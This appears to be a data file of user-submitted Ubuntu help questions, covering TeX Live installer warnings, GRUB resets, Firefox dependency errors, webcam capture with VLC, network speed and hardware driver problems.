229454	how to deal with configuration style warnings occuring from texlive 2012 installation ?	i followed the advice of izx on how to install texlive 2012 using the texlive-backports ppa . before i started i removed all texlive-related packages . the installation finished and everything seems to work fine . the only thing i noticed are some warnings in the output of the installer . here is an excerpt of the output : warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg there are more of that kind in the rest of the output : $ sudo apt-get install texlive reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : latex-beamer latex-xcolor libgraphite3 libkpathsea6 libptexenc1 lmodern pgf prosper ps2eps tex-common tex-gyre texlive-base texlive-binaries texlive-common texlive-doc-base texlive-extra-utils texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-recommended texlive-latex-base texlive-latex-base-doc texlive-latex-recommended texlive-latex-recommended-doc texlive-pstricks texlive-pstricks-doc tipa ttf-marvosym suggested packages : texlive-doc-en purifyeps chktex latexmk dvipng xindy dvidvi fragmaster lacheck latexdiff t1utils the following new packages will be installed : latex-beamer latex-xcolor libgraphite3 libkpathsea6 libptexenc1 lmodern pgf prosper ps2eps tex-common tex-gyre texlive texlive-base texlive-binaries texlive-common texlive-doc-base texlive-extra-utils texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-recommended texlive-latex-base texlive-latex-base-doc texlive-latex-recommended texlive-latex-recommended-doc texlive-pstricks texlive-pstricks-doc tipa ttf-marvosym 0 upgraded , 29 newly installed , 0 to remove and 17 not upgraded . need to get 0 b/274 mb of archives . after this operation , 450 mb of additional disk space will be used . do you want to continue [ y/n ] ? preconfiguring packages ... selecting previously unselected package tex-common . ( reading database ... 290206 files and directories currently installed . ) unpacking tex-common ( from ... /tex-common_3.13~ubuntu12.04.1_all.deb ) ... selecting previously unselected package lmodern . unpacking lmodern ( from ... /lmodern_2.004.1-5~precise1_all.deb ) ... selecting previously unselected package tex-gyre . unpacking tex-gyre ( from ... /tex-gyre_2.004.1-4~precise1_all.deb ) ... selecting previously unselected package libgraphite3 . unpacking libgraphite3 ( from ... /libgraphite3_1 % 3a2.3.1-0.2build1_amd64.deb ) ... selecting previously unselected package libkpathsea6 . unpacking libkpathsea6 ( from ... /libkpathsea6_2012.20120628-1~ubuntu12.04.1_amd64.deb ) ... selecting previously unselected package libptexenc1 . unpacking libptexenc1 ( from ... /libptexenc1_2012.20120628-1~ubuntu12.04.1_amd64.deb ) ... selecting previously unselected package texlive-common . unpacking texlive-common ( from ... /texlive-common_2012.20120611-3~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-binaries . unpacking texlive-binaries ( from ... /texlive-binaries_2012.20120628-1~ubuntu12.04.1_amd64.deb ) ... selecting previously unselected package texlive-doc-base . unpacking texlive-doc-base ( from ... /texlive-doc-base_2012.20120611-1~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-base . unpacking texlive-base ( from ... /texlive-base_2012.20120611-3~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-latex-base . unpacking texlive-latex-base ( from ... /texlive-latex-base_2012.20120611-3~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-latex-recommended . unpacking texlive-latex-recommended ( from ... /texlive-latex-recommended_2012.20120611-3~ubuntu12.04.1_all.deb ) ... selecting previously unselected package latex-xcolor . unpacking latex-xcolor ( from ... /latex-xcolor_2.11-1_all.deb ) ... selecting previously unselected package pgf . unpacking pgf ( from ... /archives/pgf_2.10-1_all.deb ) ... selecting previously unselected package latex-beamer . unpacking latex-beamer ( from ... /latex-beamer_3.10-1_all.deb ) ... selecting previously unselected package texlive-generic-recommended . unpacking texlive-generic-recommended ( from ... /texlive-generic-recommended_2012.20120611-3~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-pstricks . unpacking texlive-pstricks ( from ... /texlive-pstricks_2012.20120611-1~ubuntu12.04.1_all.deb ) ... selecting previously unselected package prosper . unpacking prosper ( from ... /prosper_1.00.4+cvs.2007.05.01-4_all.deb ) ... selecting previously unselected package ps2eps . unpacking ps2eps ( from ... /ps2eps_1.68-1_amd64.deb ) ... selecting previously unselected package ttf-marvosym . unpacking ttf-marvosym ( from ... /ttf-marvosym_0.1+dfsg-2_all.deb ) ... selecting previously unselected package texlive-fonts-recommended . unpacking texlive-fonts-recommended ( from ... /texlive-fonts-recommended_2012.20120611-3~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive . unpacking texlive ( from ... /texlive_2012.20120611-3~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-extra-utils . unpacking texlive-extra-utils ( from ... /texlive-extra-utils_2012.20120611-1~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-font-utils . unpacking texlive-font-utils ( from ... /texlive-font-utils_2012.20120611-1~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-fonts-recommended-doc . unpacking texlive-fonts-recommended-doc ( from ... /texlive-fonts-recommended-doc_2012.20120611-3~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-latex-base-doc . unpacking texlive-latex-base-doc ( from ... /texlive-latex-base-doc_2012.20120611-3~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-latex-recommended-doc . unpacking texlive-latex-recommended-doc ( from ... /texlive-latex-recommended-doc_2012.20120611-3~ubuntu12.04.1_all.deb ) ... selecting previously unselected package texlive-pstricks-doc . unpacking texlive-pstricks-doc ( from ... /texlive-pstricks-doc_2012.20120611-1~ubuntu12.04.1_all.deb ) ... selecting previously unselected package tipa . unpacking tipa ( from ... /tipa_2 % 3a1.3-17~precise1_all.deb ) ... processing triggers for doc-base ... processing 5 added doc-base files ... registering documents with scrollkeeper ... processing triggers for man-db ... processing triggers for fontconfig ... processing triggers for install-info ... setting up tex-common ( 3.13~ubuntu12.04.1 ) ... running mktexlsr . this may take some time ... done . texlive-base is not ready , delaying updmap-sys call texlive-base is not ready , skipping fmtutil-sys -- all call setting up lmodern ( 2.004.1-5~precise1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up tex-gyre ( 2.004.1-4~precise1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up libgraphite3 ( 1:2.3.1-0.2build1 ) ... setting up libkpathsea6 ( 2012.20120628-1~ubuntu12.04.1 ) ... setting up libptexenc1 ( 2012.20120628-1~ubuntu12.04.1 ) ... setting up texlive-common ( 2012.20120611-3~ubuntu12.04.1 ) ... setting up texlive-binaries ( 2012.20120628-1~ubuntu12.04.1 ) ... update-alternatives : using /usr/bin/xdvi-xaw to provide /usr/bin/xdvi.bin ( xdvi.bin ) in auto mode . update-alternatives : using /usr/bin/bibtex.original to provide /usr/bin/bibtex ( bibtex ) in auto mode . mktexlsr : updating /var/lib/texmf/ls-r-texlivemain ... mktexlsr : updating /var/lib/texmf/ls-r-texlivedist ... mktexlsr : updating /var/lib/texmf/ls-r-texmfmain ... mktexlsr : updating /var/lib/texmf/ls-r ... mktexlsr : done . building format ( s ) -- refresh . this may take some time ... done . setting up texlive-doc-base ( 2012.20120611-1~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up ps2eps ( 1.68-1 ) ... setting up ttf-marvosym ( 0.1+dfsg-2 ) ... setting up texlive-fonts-recommended-doc ( 2012.20120611-3~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up texlive-latex-base-doc ( 2012.20120611-3~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up texlive-latex-recommended-doc ( 2012.20120611-3~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up texlive-pstricks-doc ( 2012.20120611-1~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg processing triggers for tex-common ... running mktexlsr . this may take some time ... done . texlive-base is not ready , delaying updmap-sys call setting up texlive-base ( 2012.20120611-3~ubuntu12.04.1 ) ... mktexlsr : updating /var/lib/texmf/ls-r-texlivemain ... mktexlsr : updating /var/lib/texmf/ls-r-texmfmain ... mktexlsr : updating /var/lib/texmf/ls-r ... mktexlsr : done . /usr/bin/tl-paper : setting paper size for dvips to a4 . /usr/bin/tl-paper : setting paper size for dvipdfmx to a4 . /usr/bin/tl-paper : setting paper size for xdvi to a4 . /usr/bin/tl-paper : setting paper size for pdftex to a4 . warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg running mktexlsr . this may take some time ... done . building format ( s ) -- all . this may take some time ... done . processing triggers for tex-common ... running updmap-sys . this may take some time ... done . running mktexlsr /var/lib/texmf ... done . setting up texlive-generic-recommended ( 2012.20120611-3~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up texlive-fonts-recommended ( 2012.20120611-3~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up texlive-extra-utils ( 2012.20120611-1~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up texlive-font-utils ( 2012.20120611-1~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up texlive-latex-base ( 2012.20120611-3~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg running mktexlsr . this may take some time ... done . building format ( s ) -- all -- cnffile /etc/texmf/fmt.d/10texlive-latex-base.cnf . this may take some time ... done . processing triggers for tex-common ... running mktexlsr . this may take some time ... done . running updmap-sys . this may take some time ... done . running mktexlsr /var/lib/texmf ... done . setting up texlive-pstricks ( 2012.20120611-1~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up tipa ( 2:1.3-17~precise1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg setting up texlive-latex-recommended ( 2012.20120611-3~ubuntu12.04.1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg processing triggers for tex-common ... running mktexlsr . this may take some time ... done . running updmap-sys . this may take some time ... done . running mktexlsr /var/lib/texmf ... done . setting up prosper ( 1.00.4+cvs.2007.05.01-4 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg running mktexlsr . this may take some time ... done . setting up texlive ( 2012.20120611-3~ubuntu12.04.1 ) ... setting up latex-xcolor ( 2.11-1 ) ... mktexlsr : updating /usr/local/share/texmf/ls-r ... mktexlsr : updating /var/lib/texmf/ls-r-texlivemain ... mktexlsr : updating /var/lib/texmf/ls-r-texlivedist ... mktexlsr : updating /var/lib/texmf/ls-r-texmfmain ... mktexlsr : updating /var/lib/texmf/ls-r ... mktexlsr : done . setting up pgf ( 2.10-1 ) ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg processing triggers for tex-common ... running mktexlsr . this may take some time ... done . setting up latex-beamer ( 3.10-1 ) ... mktexlsr : updating /usr/local/share/texmf/ls-r ... mktexlsr : updating /var/lib/texmf/ls-r-texlivemain ... mktexlsr : updating /var/lib/texmf/ls-r-texlivedist ... mktexlsr : updating /var/lib/texmf/ls-r-texmfmain ... mktexlsr : updating /var/lib/texmf/ls-r ... mktexlsr : done . processing triggers for libc-bin ... ldconfig deferred processing now taking place what exactly is 10lmodern.cfg good for ? how can i prevent this warnings ? here is the output of sudo update-updmap : $ sudo update-updmap regenerating '/var/lib/texmf/updmap.cfg-debian ' ... warning : old configuration style found in /etc/texmf/updmap.d warning : for now these files have been included , warning : but expect inconsistencies . warning : these packages should be rebuild with tex-common . warning : please see /usr/share/doc/tex-common/news.debian.gz warning : found file : /etc/texmf/updmap.d/10lmodern.cfg done . regenerating '/var/lib/texmf/updmap.cfg-texlivedist ' ... done . update-updmap has updated the following file ( s ) : /var/lib/texmf/updmap.cfg-debian /var/lib/texmf/updmap.cfg-texlivedist if you want to enable the map files with this new file , you should run updmap-sys or updmap .
229457	default folder deleted - can not change back keybinding theme	i accidently removed default folder from /usr/share/themes and now can not change the keybindig theme back to default under advanced setting - > theme . default option is simply gone , not there anymore . could n't get it back ... i am using ubuntu 12.04 with gnome shell . any thoughts on what can bring this option back ? thanks !
229461	403 forbidden for /home/my-username/dropbox/hemsidor as directory root	i 'm trying setup apache to point the directory root to /home/my-username/dropbox/hemsidor but when i go to localhost i got 403 forbidden . i do n't have any .htaccess file in the home directory ( hemsidor ) so i do n't know what the problem is . i have tested to add options +followsymlinks -symlinksifownermatch in my httpd.conf file and then restarted apache but with no luck . what 's wrong ? thanks in advance .
229471	i ca n't watch youtube videos in either firefox or chromium . version 12.04	i ca n't watch youtube videos in either chromium browser or firefox . i 've tried installing a plugin or flash player , but neither seem to work . i 'm new to ubuntu and i 'm not real experienced on working on computers .
229473	how do i reset the grub configuration files in /etc/grub.d ?	i have been changing my grub menu to allow the use of an arch system that i am dual booting , but i managed to get rid of the ubuntu advanced options , so i want to reset the config files in /etc/grub.d to the default ones , but i am not sure what i can do short of reinstalling ubuntu . thanks in advance .
229474	raring ringtail upgrade	if i open a terminal and do sudo do-release-upgrade -d am i going to install raring ringtail if using 12.10 now ? is this advisable ... .is it safe .
229475	how to restore ubuntu data after install windows 7 ?	i have installed windows 7 . i have lost my all data which were in ubuntu . now want to get my all previous data . i have installed windows 7 in other partition . ubuntu partition lost all data if it is possible that i restore ubuntu please tell me .
229482	launcher settings ?	hi my name is jim simoni . i wish there was some way to relate to the desktop to the old desk top with menus so this transition would be easier . i like the old organisation in the menu bar . i had places , applications , system and others i have forgotten . i need the list to make the transfer to the new system . can some one tell me how to look or get a list of all the organization menue it had ? my problem though is that i can not find any setting that control the launcher . the quide says in settings appearance there should be a slider that controls the size of the icons . i can not find it . i do n't know if my theme makes it invisible ? can someone help i ca n't find it . jim
229493	ubuntu 12.10 wo n't see my external hard drive	so here 's the story : i installed ubuntu 12.10 on my acer aspire 7551 last night without a hitch . i have two hard drives from my now out-of-service desktop that was running windows 7 that i 'm trying to copy and backup to the laptop so i can then export them to my external hd . this external is detected and everything , but when i put my hard drives from my desktop in the external case to export the files , ubuntu does n't see them . i even have a usb 2.0 to sata cable kit , and that does n't seem to work either . however , i could see the files of one of this hd when i had windows 7 running on the laptop ... any ideas ?
229494	blinking cursor on boot after upgrade	i have a blank screen with only a blinking cursor after upgrade via deselect responds to nothing ! have tried options f2 , still zip on reboot . what do i do ?
229502	convert each slide to png with libreoffice impress in terminal with excel graph	i need to convert each slide in a powerpoint presentation to a png with the command line . i have tried to convert it to a pdf then to individual pngs but the images have n't exported properly . these images are graphs originally from microsoft excel . if i export it as a png from within libreoffice the graph exports properly , but not if i convert it to a pdf first using unoconv or the export tool in libreoffice impress . here is a couple of examples , in impress : as you can see the image works . but when this is exported to pdf it looks like : so whats going wrong ? as if its directly exported to png in libreoffice it looks exactly as is in the presentation . also if i convert it to the libreoffice file format this also happens .
229505	defcon totally screwed up my system !	i 'm using ubuntu 12.04 . downloaded and ran a game called defcon , by introversion software , and then my display problems began ! at first , my smallest monitor stopped receiving input . then , when i exit the game , still no input & i look at the 'display ' system settings menu and it is off . i try switching it back on , and my system totally crashes . i restart my system , and try two more times at switching it back on , before i go back to basics and switch mirroring on before switching that monitor on . now i 've switched mirroring off , but if i set the resolution for my largest monitor above that of my other monitor , my system crashes ! what the heck ! does anyone have a solution to my problems ?
229506	firefox dependencies problem on 12.10	i did a fresh install of ubuntu 12.10 today and now am getting the following error : you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : firefox-globalmenu : depends : firefox ( = 17.0.1+build1-0ubuntu0.12.10.1 ) but 16.0.1+build1-0ubuntu1 is installed e : unmet dependencies . try using -f. when i run the sudo apt-get -f install ... i get the following after i type the `` y '' : ( reading database ... 179765 files and directories currently installed . ) preparing to replace firefox 16.0.1+build1-0ubuntu1 ( using ... /firefox_17.0.1+build1-0ubuntu0.12.10.1_i386.deb ) ... unpacking replacement firefox ... dpkg-deb ( subprocess ) : decompressing archive member : internal gzip read error : ' < fd:4 > : incorrect data check' dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives/firefox_17.0.1+build1-0ubuntu0.12.10.1_i386.deb ( -- unpack ) : can not copy extracted data for './etc/apparmor.d/usr.bin.firefox ' to '/etc/apparmor.d/usr.bin.firefox.dpkg-new ' : unexpected end of file or stream please restart all running instances of firefox , or you will experience problems . processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/firefox_17.0.1+build1-0ubuntu0.12.10.1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this error is preventing me from installing synaptic package manager and is also preventing me from installing anything with the software center or update manager . i tried uninstalling firefox and also upgrading firefox to no avail as well . open to suggestions .
229509	best book/source to learn the unix commands	so i was intern at this company wherein they 'd use just putty . now i 've never worked with unix commands , apart from the basic , compile code , run c code . but now i would love to know all the things about the unix . starting off with the commands , from the most basic of all to the decent level . also , moving forward , how the different folders/files are arranged in a unix ( ubuntu is installed on my system ) system . i have picked up a couple of books , but they dont seem to help . can someone suggest a comprehensive book that 'll fulfill my needs . because , working with a gui on ubuntu does not really give me the real feel of things . hence i 'd want to move on to the terminal instead . thanks .
229511	how can i add an applet to mate from the terminal ?	how could i add an applet to the mate panel from the terminal using mateconftool-2 . i 'm specifically asking for dockbarx , but i 'd like to add other applets as well ( matenu , notification area and clock ) . what i want to do is instead of manually right-clicking the panel , opening the add to panel window and selecting the applet , do this from the command line . how can this be done with mateconftool-2 ? edit : i 've found that it can be done with this /usr/lib/mate-panel/mate-panel-add however i do n't know yet how i can add an applet with it . this for example would add a gedit launcher to the panel : /usr/lib/mate-panel/mate-panel-add -- launcher=/usr/share/applications/gedit.desktop i want to do that but instead of a launcher an applet . /usr/lib/mate-panel/mate-panel-add -- applet= something like this but i do n't know how to add the rest ( in this case call the dockbarx applet ) .
229516	how to install packages without internet connection	i 'm just beginner to linux operating system i have following doubts 1.now i am using ubuntu 10.10 version i dont have net connection in my home so how can i install packages manually for ex : if me and my friend have same version and same hardware config if he installed installed all packages in his laptop can i install all his packages by copy packages from his lap to mine ? ? if there is a way then how to do it ? ? thx guys in advance ... .. : )
229521	mount ecryptfs automatically after ftp login	how can i get my ubuntu server 12.04 to automatically mount the encrypted home partition after an ftp login ? it will automatically mount after an ssh login and i can then access the encrypted information over ftp but i do n't want to have to log into ssh every time i want to use ftp .
229526	permission denied when copying my files into a drive	it`s been my very first day of using ubuntu 12.10 version in my lappy . as a newbie in ubuntu , i am facing a problem regarding about transferring any files into my drives except the home . wehenever i am trying to copying or moving any files then it is giving me an error which is `` there was an error copying files into /media/null/403ed6ac-29d8-4f0a-b8c7-d7e822023756/name-of-my-file permission denied '' . even whenever i am copying a file and then trying to pasting it in a local drive then it is not showing me the paste option on right clock too . i have three drives one is for home , other both are having a space of 150gb each and i gave it as an ext4 file mode . i had installed the ubuntu 12.10 os by deleting all of my previous partitions and then re-created the partitions again . i gave the others two drive in ext4 options . so please can anyone tell me how to solve this problem . please help me.. : ) thank you please note : i can able to copying my files into home or in desktop but not in the other two drives ...
229529	how to install a .ttf font in xubuntu 11.10 32-bit	i installed the ocr-a font in ubuntu 11.10 64-bit using the font viewer . as usual , i just double-clicked the file and then install , without problems . but , when i tried to do the same in another pc with xubuntu 11.10 32-bit , it simply does nothing . i installed gnome-font-viewer to try it ( i know xubuntu uses xfce , but nothing worked ) . so , do anyone know how to install a font in xubuntu 32-bit ? will i need another kind of font viewer ?
229530	ca n't install a dependency ?	i 've been trying to install 'boot-repair ' but it keeps saying : the following packages have unmet dependencies : depends : boot-sav ( > = 3.196 ) but 3.196~ppa3~quantal is to be installed e : unable to correct problems , you have held broken packages . when i try installing 'boot-sav ' , everything seems okay , but when i try it again , it just shows the same message over and over again . how can i fix such a problem ? thanks .
229532	run vlc without showing window	i 'm using vlc to capture an image from my webcam by running the following command : cvlc v4l2 : ///dev/webcam -- no-audio -- run-time 5 -- scene-path $ pwd \ -- scene-replace -- scene-format png -- video-filter scene vlc : //quit . it works great except that i 'm running this command in a cron job and it opens a player window for the duration of the capture , which gets in the way of me doing other stuff . is there any way to hide this window ? can i tell vlc not to display this window whenever it runs ? i looked at the help docs but could n't find anything relevant in there . thanks !
229533	unfocus browser flash player to use shortcuts	once i click to play a video in youtube i can no longer use any other shortcut ( eg : alt+pgdwn to change tab ) , i need to click somewhere else in the page , is this normal ? how can i un-focus the flash player via keyboard ? thanks edit i 'm using firefox ( the latest ) in ubuntu 12.10 on a toshiba laptop m200
229535	move window to corner and resize in gnome shell	in unity with the ctrl-alt-keypad_7 keybinding i can move a window to the top-left corner and it is automatically resized to a quarter of my desktop size . in gnome-shell , in dconf , i found the relevant option for gnome-shell : /org/gnome/desktop/wm/keybindings move_to_corner_nw , however this just moves the window , without actually resizing it . would you have any hint ? thanks !
229536	how enable desktop sharing for vps server ubuntu 12.04	i just got a vps server running 12.04 , i have ssh access but i do n't know how access gui and remote desktop
229538	in termninal , how can i find 1 phrase , in multiple files containing the phrase multiple times ?	trying to change the first background-color following the `` body { `` style , from whatever it is to `` background-color : # 000000 ; '' in seven different stylesheets.css files . also each .css file contains more than 10 instances , which is why i want to only change the one following the `` body { `` style code . possible ?
229542	is it possible to install gnome shell on the nexus 7 version of ubuntu ?	basically just the question , has anyone tried it ?
229543	cat 6 only 100mbit speed	i tried two different cat6 cables directly connected between my two ubuntu machines . this one i ordered online : http : //www.amazon.co.uk/gp/product/b002sqpdxs/ref=wms_ohs_product only achieves 100mbit speeds , but does appear to be supporting cross-talk ( direct pc to pc ) , the other cat 6 cable , worked perfectly and gets the full 1gigabit speed . both tests were performed using ftp and checking the network monitor with direct pc to pc connection . did the product from amazon lie to me or do i need to manually set a setting somewhere in ubuntu for some cables ? i had thought 10 quid for 20m of gigabit ethernet cable was a bit cheap , you get what you pay for ... regards , stu update : it seems that after rebooting , the device is set to 1000mbit sec when looking it up with sudo ethtool eth0 however after a while , this will drop down to just 100 , after which to reset it to 1000 again , i have to reboot , and simply unpugging and re-plugging in the cable does n't do it . i tried setting this in networking config file as suggested here : auto eth0 iface eth0 inet static pre-up /usr/sbin/ethtool -s eth0 speed 1000 duplex full but that resulted in my networking failing to start . is there a problem with my 'auto-negotiation ' or something ? can i manually override a setting to 1000mbit ?
229544	ubuntu 12.10 disappearing sound	very new to ubuntu but have checked some of the other posts and tried some suggestions but keep getting the same problem . did a clean start and the sequence of events is as follows 1.instal ubuntu 12.10 2.instal vlc 3.play songs/video without problem alsamixer display has master , headphone , speaker , pcm , mic etc after restart ... . no sound and alsamixer only has pcm displayed ! !
229545	install dbmail or other e-mail database	i 'm starting to use ruby to parse and store e-mails , but do n't want to reinvent the wheel . i have a subset of e-mails , all in one account stored locally , which i would like to keep in a database . what software will do this ? dbmail does n't look to work under either 12.04 or 12.10 , unfortunately . apache james is the only other option ?
229546	macbook pro 13 '' retina ( 10,2 ) : keyboard and touchpad do n't work correcltly	i 'm dealing with ubuntu since about 5 years and installed it on several laptops . now i 'm stuck when trying to install ubuntu 12.04.1 on a brand new macbook pro 13 '' retina ( 10,2 ) . i sucessfully can start ubuntu from an usb stick , the ubuntu desktop is visible , a mouse cursor is visible . but there is no respond to keyboard or touchpad input . so i can not really install ubuntu on the macbook . the details of my approach : prepare an empty usb stick download `` iso 2 usb efi booter for mac '' and copy the file bootx64.efi to the usb drive as /efi/boot/bootx64.efi . download ubuntu 12.04.1 desktop for mac from http : //cdimage.ubuntu.com/releases/1-amd64+mac.iso and copy the iso the usb drive as /efi/boot/boot.iso put the usb stick into the macbook press and hold the `` alt '' button while switching the macbook on select `` efi boot '' from the boot menu that appears and press the return / enter key immediately a black terminal screen appears with the headline `` welcome to the ubuntu iso < < - > > efi booter '' . 30 seconds later the familiar ubuntu startup graphics screen is showing . further 20 seconds later ubuntu has started and the desktop is visible - in wonderfully fine resolution now the computer does not respond to any actions on the touchpad nor the keyboard who did install ubuntu on this macbook pro 13 '' retina ( 10,2 ) successfully ? on this site https : //help.ubuntu.com/community/macbookpro this unit is not listed yet , anyway . any help would be greatly appreciated ! dirk ps : i could now install ubuntu with an external usb keyboard/mouse set . but now , after showing the grub menu , a kernel panic error appears and booting stops : -/ seems that the ubuntu images fit not to a macbook pro retina 13 '' ( 10,2 ) yet . pps : ok , there are new facts : if i edit the boot options and enter `` nomodeset noapic '' ubuntu starts and keyboard and touchpad work ! now i have to enable wifi ... ppps : after installing broadcom firmware from usb live stick as described in other posts , wifi was enabled . then i could update ubuntu normally to 12.10 . after this , i must not enter `` nomodeset noapic '' in the grub menu anymore . last thing now is the touchpad . the driver seems not to be there . the touch pad is only showing as mouse . t.b.c .
229552	grub rescue after installing ubuntu from usb	i have windows 7 installed in my internal hdd and wanted to try out ubuntu so i have an usb to put ubuntu liveusb on and installed ubuntu on a external hdd and everything worked out fine . now the problem . if i remove the external hdd and try to boot windows normally it shows the grub rescue screen . the only way to boot into windows is by having the external hdd attached . is there any way i can make it so i wo n't have to have the external hdd attached to be able to boot my windows 7 ?
229557	which login manager is this ?	may someone tell me the name of this login manager ? additionally i would like to know : how the background image has been added ? how to install this ( with the apt-get command ) ? will this work with cinnamon de ? is it resource intensive ? how much ram and disk space it eats up ? note : cinnamon is the only de i am currently having , which has been installed upon ubuntu minimal having lamp stack .
229560	indicator-datetime problem	i am using ubuntu 10.04 and since a few days ago , i do not have the time on my panel any more . as i already found among answers to similar issues , it must be related to `` indicator-datetime '' but it seems that this application is obsolete . does anyone know what i should exactly do get the time back ? thanks in advance for your help
229562	rt73.bin for ubuntu 12.04 lts ?	i have a d-link usb wlan stick and want to install ubuntu 12.04 alternate . the installer asks me to insert an exchangable drive containing 'rt73.bin ' , the driver . i can not find any binary downloads , but can not build the package , because i have no other linux pc . what can i do ? //edit : the reason why i want to do this during setup is that i want to setup an ltsp server . i only found guides that assume one has internet connection - but i have not . what can i do ?
